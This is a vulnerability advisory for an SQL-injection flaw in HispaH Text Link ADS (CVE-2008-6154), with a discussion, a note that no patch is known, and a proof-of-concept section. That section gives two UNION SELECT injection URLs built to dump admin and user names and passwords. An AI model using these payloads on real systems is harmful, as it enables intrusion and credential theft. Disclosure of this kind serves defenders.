HispaH Text Link ADS 'index.php' SQL Injection Vulnerability
BID:31649
Info
HispaH Text Link ADS 'index.php' SQL Injection Vulnerability
| Bugtraq ID: | 31649 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-6154 |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 08 2008 12:00AM |
| Updated: | Apr 16 2015 05:52PM |
| Credit: | Cyb3r-1sT |
| Vulnerable: |
HispaH Text Link ADS 0 |
| Not Vulnerable: | |
Discussion
HispaH Text Link ADS 'index.php' SQL Injection Vulnerability
HispaH Text Link ADS is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query.
A successful attack could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
HispaH Text Link ADS is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query.
A successful attack could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Exploit / POC
HispaH Text Link ADS 'index.php' SQL Injection Vulnerability
Attackers can exploit this issue via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/index.php?action=buy&idcat=9999999'+union+select+0,concat(username,0x3a,password)+from+admin_detail/*
http://www.example.com/index.php?action=buy&idcat=9999999'+union+select+0,concat(username,0x3a,password)+from+reguser/*
Attackers can exploit this issue via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/index.php?action=buy&idcat=9999999'+union+select+0,concat(username,0x3a,password)+from+admin_detail/*
http://www.example.com/index.php?action=buy&idcat=9999999'+union+select+0,concat(username,0x3a,password)+from+reguser/*
Solution / Fix
HispaH Text Link ADS 'index.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].